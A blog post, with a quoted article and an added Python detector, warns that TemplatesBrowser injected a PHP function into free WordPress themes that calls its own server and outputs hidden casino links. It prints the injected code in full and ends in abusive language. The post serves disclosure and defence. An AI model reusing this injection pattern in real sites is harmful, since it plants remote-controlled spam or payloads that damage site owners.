Templatebrowser puts link spam in WordPress

If you have ever downloaded a WordPress template from the TemplateBrowser site, please read!

Yesterday, something very ugly revealed itself and I wanted to make as many people aware of it as I could.

At the very bottom of the WordPress blog, the words Online Casino began to appear. This happened on 2 blogs that I oversee. At first I thought there was something wrong with my server. I searched all through the PHP files for the name of the site (statcounter), but couldn’t find it.

You couldn’t see this text using a browser; it was set to be hidden. A friend of mine using IE 7 discovered it when an error appeared after loading the page. Looking at the source of the blog showed the name of the statcounter website embedded at the very bottom of the page. And the text of “Online Casino” was at the bottom of the page. Firefox and IE 6 did not show an error, but if you watched very carefully you could see a quick connection to the statscounter site to grab data.

We searched all over and finally came across this page which seems to reveal everything!

Templatesbrowser.com puts link spam in WordPress

It seems the site Templatebrowser which hosts hundreds of free WordPress templates is injecting SPAM code into the WordPress files so it can secretly link to other sites. Here is the text of the article from Onnoot.com.


My brother Wessel used to be very positive about the thousands of free WordPress themes that you can download to markup your weblog.

But one should be careful. With my web page monitoring service Follow That Page, which also monitors hidden text, I found that my brother’s website contained hidden commercial links to casinos and hotels. My brother checked it out and discovered the site that is responsible for all this: www.templatesbrowser.com/wordpress-themes/.

How does Templatesbrowser.com work?
On their site, you can download more than a hundred free WordPress themes. These themes come from other websites, but Templatesbrowser.com adds a sneaky piece of code at the end of the file functions.php:


function credits()
{
    $url = "http://get.templatesbrowser.com/wp.php?" . "url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
    $check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
    if ($check)
    {
        @readfile($url);
        fclose($check);
    }
}

If you use one of those templates in your WordPress weblog, this piece of PHP code returns the following HTML code:

<div id="copyl" style="display: none;"><a href="http://www.casinotropez.[...]">casino en ligne</a></div>


This produces a link at the bottom of every WordPress page that is invisible to human readers.

Templatesbrowser.com apparently does this to increase the pagerank of certain websites. We’re not sure if Google falls for this little link spam trick. But if Google does find out that your page contains link spam, you risk being punished. That could mean that your website is removed from Google’s search result pages.

I did exactly as the article said and, lo and behold, I have the “credits function” in my blog code. I removed it and the hidden link disappeared off the main page and there was no trace of it in the source code of the web page.

If you have ever downloaded a template from Templatebrowser, please check the functions.php code and remove their link! We have also removed a link back to their main site and will never download a file from them again!
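
One way to automate that check, as an added example (not code from this post or from Onno's article): scan_php flags a PHP file that both names a remote URL and calls a function able to fetch it, and hidden_offsite_links lists links inside display:none elements that point away from the blog's own host. The function names, the blog.example and casino.example hosts and the sample footer are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

FETCH_CALL = re.compile(r"\b(readfile|file_get_contents|fsockopen|fopen|curl_exec)\s*\(", re.I)
URL_HOST = re.compile(r"""["']https?://([A-Za-z0-9.-]+)""")
VOID = {"br", "hr", "img", "input", "link", "meta"}  # tags with no closing tag

def scan_php(source):
    """Return (fetch_calls, hosts) if the file both names a remote URL and can fetch it."""
    calls = sorted({m.group(1).lower() for m in FETCH_CALL.finditer(source)})
    hosts = sorted({m.group(1).lower() for m in URL_HOST.finditer(source)})
    return (calls, hosts) if calls and hosts else ([], [])

class HiddenLinkFinder(HTMLParser):
    """Collect hrefs of <a> tags that sit inside an element styled display:none."""
    def __init__(self):
        super().__init__()
        self.hidden_stack, self.links = [], []  # one hidden flag per open element
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        style = (attrs.get("style") or "").replace(" ", "").lower()
        hidden = "display:none" in style or (bool(self.hidden_stack) and self.hidden_stack[-1])
        if tag == "a" and hidden and attrs.get("href"):
            self.links.append(attrs["href"])
        if tag not in VOID:
            self.hidden_stack.append(hidden)
    def handle_endtag(self, tag):
        if tag not in VOID and self.hidden_stack:
            self.hidden_stack.pop()

def hidden_offsite_links(html, site_host):
    """Hidden links whose host differs from the blog's own host."""
    finder = HiddenLinkFinder()
    finder.feed(html)
    return [u for u in finder.links if urlparse(u).hostname not in (None, site_host)]

# The injected function quoted above, abbreviated to the lines that matter.
SAMPLE_PHP = """function credits() {
$url = "http://get.templatesbrowser.com/wp.php?" . "host=" . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
if ($check) { @readfile($url); fclose($check); }
}"""
# Constructed page footer; casino.example stands in for the elided casino URL.
SAMPLE_HTML = ('<p><a href="http://blog.example/about">About</a></p><div id="copyl" style="display: none;">'
               '<a href="http://casino.example/">casino en ligne</a></div>')

if __name__ == "__main__":
    print(scan_php(SAMPLE_PHP), hidden_offsite_links(SAMPLE_HTML, "blog.example"))
```

A hit from scan_php is a prompt to read the file by hand, since a legitimate theme can also call these functions.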

A huge thank you to Onno for this discovery, and an even bigger GO TO HELL YOU MISERABLE BASTARDS to Templatebrowser for putting crap code into a template they don’t even own and making it look like the template’s author may be to blame. This is shameful and WordPress and the template authors should work to shut that piece of crap site down!



One Response to “Templatebrowser puts link spam in WordPress”

  • ej:

    Wow, nice of you to give credit to your buddy for noticing the problem, fixing it, and finding reference to the web page mentioning it.
    Geez man, for the first time in a long time, I managed to figure something out before you…
    Can’t I get a little love
    Great site by the way.
    later
    e
